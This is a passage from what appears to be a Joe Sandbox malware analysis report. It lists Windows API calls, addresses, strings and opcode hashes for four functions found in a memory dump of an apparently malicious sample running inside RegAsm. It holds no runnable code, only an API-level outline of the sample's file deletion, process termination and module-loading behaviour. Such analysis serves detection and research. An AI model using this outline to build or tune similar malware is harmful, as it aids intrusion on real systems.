                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                              • String ID: pth_unenc
                                                                                              • API String ID: 3325800564-4028850238
                                                                                              • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                              • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                              • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                              • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                              Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                              • String ID: pth_unenc
                                                                                              • API String ID: 1872346434-4028850238
                                                                                              • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                              • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                              • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                              • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                              Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                              • GetLastError.KERNEL32 ref: 00440D85
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                              • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                              • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                              • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                              Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                              • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 4100373531-0
                                                                                              • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                              • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                              • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                              • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99